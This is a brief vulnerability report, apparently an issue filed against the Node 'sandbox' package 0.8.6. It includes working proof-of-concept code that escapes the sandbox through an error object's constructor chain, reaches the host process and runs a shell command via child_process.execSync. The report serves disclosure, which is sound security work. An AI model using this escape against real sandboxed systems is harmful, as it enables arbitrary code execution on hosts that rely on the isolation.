Sandbox Escape Bug

[seongil-wi]

• Sandbox version: 0.8.6
• Node version: 18.15.0

var Sandbox = require("sandbox")
var code = `
    try{ 
        valueOf()
    } catch(pp){
        pp.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch flag'); 
    }
`

s = new Sandbox()
s.run(code)

We found a sandbox escaping bug. This bug can be triggered by calling valueOf() function.
Also, we can execute arbitrary shell code using the process module.